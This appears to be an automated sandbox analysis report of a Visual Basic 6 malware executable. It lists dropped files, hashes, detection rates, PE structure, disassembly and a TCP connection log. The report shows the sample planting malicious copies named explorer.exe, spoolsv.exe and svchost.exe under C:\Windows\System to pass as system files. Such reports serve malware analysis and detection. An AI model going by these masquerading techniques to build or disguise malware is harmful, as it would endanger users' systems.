                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: m7iukFCY93.exe, Detection: malicious, Browse
                                                                                  • Filename: Bc90WRHFvI.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..A..A.....@..(..B.....@..RichA..........................PE..L.../..b..................... ....................@.............................................................................(...........................................................................8... ....................................text............................... ..`.data...............................@....rsrc...............................@..@..^............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\Logs\waasmedic\waasmedic.20220805_070938_705.etl

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):8192
                                                                                  Entropy (8bit):2.7288702499822977
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:11znr522cab7kUTFb7kEKb7kl7b7kwb7kbIl9lKb7k0tpl+b7k3/Rb7kUb7kwtbH:71200UTF0R0p0w0U9M0Cl+0350U0i09O
                                                                                  MD5:CEAD2041C8D4962195D07618A29DC8CB
                                                                                  SHA1:9F8846FC929472F0F34EB86566C63E0BB0024744
                                                                                  SHA-256:49CE3E0B0082B180DAE60FC7F4EBF01359D027E1BF93FC51C6AAB2F38343F579
                                                                                  SHA-512:03673ACA340C5B4FE28F74E87E130AF1BC76B66466D1D507C594A3C41CF152E64CAA78018F97596AF2D980299F39D60BFE3ED8A7A7EAAD81B756FCE385425C61
                                                                                  Malicious:false
                                                                                  Preview:....................................................!...............................l.....@......................B.......hpw....Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1.............................................................#..2.... ......I.S............E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.8.0.5._.0.7.0.9.3.8._.7.0.5...e.t.l.............P.P.....l.....@.................................................................9.B...@.....17134.1.amd64fre.rs4_release.180410-1804............5.@...@.....OYo."(.s..O........WaaSMedicSvc.pdb............................................................................................................................................................................................................................

                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):55
                                                                                  Entropy (8bit):4.306461250274409
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                  Malicious:false
                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                  C:\Windows\System\cmsys.cmn

                                                                                  Download File
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                  Category:dropped
                                                                                  Size (bytes):56286
                                                                                  Entropy (8bit):5.402091021498643
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:PyMapcrHsCNwn1d0kelTaGNpSz17sjQRrCjmZIclnlZ+/s:Pq8wnSxdqIclnlZCs
                                                                                  MD5:276F671F15DAEEA9B0A348C035211481
                                                                                  SHA1:0B33726249C5FFEC7A23F44506F533879F46B5AE
                                                                                  SHA-256:380DB9B45C38368CE654C7976EBADA338C026047B020D4924D29B73978399ECE
                                                                                  SHA-512:2502DB102655C3E43A0DD569D2214618676039C3F0BCA37DD9175C2A1B693B76734EDA2E4B51EBE37473B00AF931BB9FFF4DCD9C665485273FBA2CA186102060
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>.<html lang="en-US" class="s-dark site-s-dark">..<head>...<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO Premium plugin v18.0 (Yoast SEO v18.4.1) - https://yoast.com/wordpress/plugins/seo/ -->..<title>What happened to the old ZXQ website? | ZXQ</title><link rel="preload" as="font" href="https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2" type="font/woff2" crossorigin="anonymous" />..<link rel="canonical" href="https://zxq.net/what-happened-to-the-old-zxq-website/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="article" />..<meta property="og:title" content="What happened to the old ZXQ website?" />..<meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website

                                                                                  C:\Windows\System\explorer.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281083
                                                                                  Entropy (8bit):5.202661139115795
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unL:UvEN2U+T6i5LirrllHy4HUcMQY6c
                                                                                  MD5:A6F18E47BFFD6F5C4AA28B67644DBDBE
                                                                                  SHA1:DCDD1C1A4AE4B4895C6178B74F6E2EE9E65E5E4A
                                                                                  SHA-256:68322016C65440FC7D65639B5FFFDA0FCB88A48C71A7EBFB97538CEEFF01E169
                                                                                  SHA-512:13708F55B9CDC2C543A0E30390A5DCC5FEF84FE6C9AB2F91C051072A4CD6A52C6DB46959FD426338575D2E86D023FA3539783CC7ED08E013639A47ECF9C7755A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\System\spoolsv.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281050
                                                                                  Entropy (8bit):5.203679658631862
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unp:UvEN2U+T6i5LirrllHy4HUcMQY6A
                                                                                  MD5:3BA9E53239D4DCA948B4BFCBB08D7F34
                                                                                  SHA1:DCAEACF865EEC33FC25F070BD14E625DB62EAEEA
                                                                                  SHA-256:DE744B26539460F87FDE59A46F8B02B804B48B09F8858C6E47D5A91884BDB815
                                                                                  SHA-512:253A7D9149D3BF78B3CF1388F8F938F9CA88BF32BBCFA839B69AA291AE3EE8012A18B3BD8D9C46C9E15F7112FD08F8B8DFA9231A7D54F4C6BB38D9BAC3F3CD77
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Windows\System\svchost.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System\spoolsv.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281069
                                                                                  Entropy (8bit):5.1944174556657225
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6uns:UvEN2U+T6i5LirrllHy4HUcMQY6/
                                                                                  MD5:B61A3DA9B4DB4644497B9CC1BE87515F
                                                                                  SHA1:AB2D7BCD8ED29C7CB153C773E51E67183DDAE86F
                                                                                  SHA-256:0BB1AB1BD7CE02E6CBAD5A5090E784EA8C99A0EDCDDFF9798CF6ADCFB473E966
                                                                                  SHA-512:46001689BBA5AEFF7D05B51400FFF8E4B833A65DAF26D2AC2C66B3535CBE17F92F3A2415F3A6C65404032507C66B6658C8EF8D83A24DCA9C53666C5ABD6A160D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):5.4282107837365885
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Lg3gn9y1Cj.exe
                                                                                  File size:416083
                                                                                  MD5:45061e4da841c2587d0890148705a142
                                                                                  SHA1:eb68218c1d70f3ba00f8190c8171ad1cfa2fb42a
                                                                                  SHA256:6731f235ff78e22e5a0f1503542926bb707a95251b8cbd22c56fbd7fc5a8cbbf
                                                                                  SHA512:01a561bbb8418364078e4751e69a5d61075220cfbaa7582a0b664ccc1fd45b6dd1accc4ef3dd2b2e6b0dc1a99d9e5f5605ee453eb6c1010c28a189109a51c294
                                                                                  SSDEEP:6144:UvEN2U+T6i5LirrllHy4HUcMQY61DdreIfa:GENN+T5xYrllrU7QY61ra
                                                                                  TLSH:A3946D6AFB64321AF577D6F0692792697B397D321F629C5F92C06B082474213B2B031F
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@................

                                                                                  File Icon

                                                                                  Icon Hash:20047c7c70f0e004

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403670
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:
                                                                                  Time Stamp:0x4DF7AFFC [Tue Jun 14 19:01:16 2011 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:98f67c550a7da65513e63ffd998f6b2e

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  push 00403ED4h
                                                                                  call 00007F135C6F16E5h
                                                                                  add byte ptr [eax], al
                                                                                  inc eax
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], dh
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], bh
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ecx-7FFA577Dh], dl
                                                                                  adc eax, dword ptr [bx-4Fh]
                                                                                  push edx
                                                                                  xchg eax, ebx
                                                                                  pop eax
                                                                                  jnc 00007F135C6F167Dh
                                                                                  nop
                                                                                  add al, 00h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ecx], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax+00h], al
                                                                                  hlt
                                                                                  test al, F6h
                                                                                  add byte ptr [edi+69h], dl
                                                                                  outsb
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  movsd
                                                                                  test byte ptr [eax], 00000019h
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax+00000000h], cl
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [edx], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [edi], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ebp-4E810EB2h], al
                                                                                  pushfd
                                                                                  call far 1AF7h : C9C2984Bh
                                                                                  jo 00007F135C6F169Bh
                                                                                  cmp byte ptr [ecx], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax-58000000h], bl
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ecx], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ecx+ebp*4], bh
                                                                                  test byte ptr [eax], 00000001h
                                                                                  and byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax-5Bh], ah
                                                                                  test byte ptr [eax], 0000001Bh
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [ebp+45h], dh
                                                                                  js 00007F135C6F1749h
                                                                                  popad
                                                                                  je 00007F135C6F1755h
                                                                                  push 0040C100h
                                                                                  fadd st(0), st(0)
                                                                                  inc eax
                                                                                  add bl, bl
                                                                                  scasb
                                                                                  dec ecx
                                                                                  test dword ptr [ecx+ebx-3F56B459h], eax
                                                                                  mov bl, 8Fh
                                                                                  xor eax, 70C5231Dh
                                                                                  rol byte ptr [edi+edx*8-12h], cl
                                                                                  salc
                                                                                  dec edx
                                                                                  mov ah, 13h
                                                                                  in eax, dx
                                                                                  fsub qword ptr [edi]
                                                                                  push 31CCFF3Ch

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2ac840x28.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x5e0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2500x20
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x284.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x2a7280x2b000False0.3680675417877907data5.947197438251493IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .data0x2c0000x1b740x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x2e0000x5e00x1000False0.118408203125data1.6929355482699409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .tdata0x2f0000xf0000xf000False0.0013346354166666667data0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_ICON0x2e2f80xcd0dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 0, next used block 0
                                                                                  RT_GROUP_ICON0x2e2e40x14data
                                                                                  RT_VERSION0x2e0f00x1f4dataEnglishUnited States

                                                                                  Imports

                                                                                  DLLImport
                                                                                  MSVBVM60.DLLEVENT_SINK_GetIDsOfNames, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaPut4, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, __vbaAryVar, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaBoolStr, __vbaExitProc, __vbaI4Abs, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaErase, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, __vbaI2I4, DllFunctionCall, __vbaVarLateMemSt, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaFixstrConstruct, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarSetVar, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaVarLateMemCallLd, __vbaVarSetObjAddref, __vbaRecDestructAnsi, __vbaLateMemCallLd, _CIatan, __vbaAryCopy, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, __vbaVarLateMemCallSt, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Aug 5, 2022 09:09:15.473563910 CEST4975380192.168.2.4104.18.114.97
                                                                                  Aug 5, 2022 09:09:15.491090059 CEST8049753104.18.114.97192.168.2.4
                                                                                  Aug 5, 2022 09:09:15.493091106 CEST4975380192.168.2.4104.18.114.97
                                                                                  Aug 5, 2022 09:09:15.496514082 CEST4975380192.168.2.4104.18.114.97
                                                                                  Aug 5, 2022 09:09:15.513952017 CEST8049753104.18.114.97192.168.2.4
                                                                                  Aug 5, 2022 09:09:15.521750927 CEST8049753104.18.114.97192.168.2.4
                                                                                  Aug 5, 2022 09:09:15.617422104 CEST4975380192.168.2.4104.18.114.97
                                                                                  Aug 5, 2022 09:09:16.963844061 CEST4975380192.168.2.4104.18.114.97
                                                                                  Aug 5, 2022 09:09:28.189430952 CEST4976080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:28.216586113 CEST8049760142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:28.216830015 CEST4976080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:28.219057083 CEST4976080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:28.246346951 CEST8049760142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:28.246371984 CEST8049760142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:28.246386051 CEST8049760142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:28.246483088 CEST4976080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:28.249911070 CEST4976080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:28.249958992 CEST4976080192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.782454014 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.809376955 CEST8049761142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:30.809510946 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.905103922 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.932090044 CEST8049761142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:30.932235003 CEST8049761142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:30.932254076 CEST8049761142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:30.932307005 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.932333946 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.936908960 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:30.936959028 CEST4976180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.015863895 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.043072939 CEST8049762142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:33.043263912 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.049024105 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.076025963 CEST8049762142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:33.076080084 CEST8049762142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:33.076112986 CEST8049762142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:09:33.076313019 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.079133034 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.093545914 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:33.093641996 CEST4976280192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:09:38.442416906 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:38.608819008 CEST804976451.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:38.609069109 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:38.610742092 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:38.777107954 CEST804976451.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:38.777231932 CEST804976451.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:38.777374029 CEST4976480192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:39.267883062 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:39.267934084 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:39.268999100 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:39.298546076 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:39.298590899 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:39.643004894 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:39.643240929 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.254115105 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.254175901 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.254524946 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.254524946 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.254617929 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.295370102 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.419905901 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.419989109 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.420087099 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.420110941 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.445852041 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.445909977 CEST4434976651.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.445931911 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.446058035 CEST49766443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690129042 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690174103 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:40.690273046 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690960884 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:40.690982103 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.032985926 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.035249949 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.329643011 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.329710960 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.344166994 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.344188929 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.513824940 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.515475035 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.515496016 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.515610933 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.682277918 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682301044 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682358027 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682413101 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.682430983 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682444096 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.682466984 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.682549000 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.850943089 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.850991964 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851121902 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851243019 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851258993 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851303101 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851325035 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851340055 CEST4434976951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:09:41.851388931 CEST49769443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:09:41.851392031 CEST4434976951.81.194.202192.168.2.4
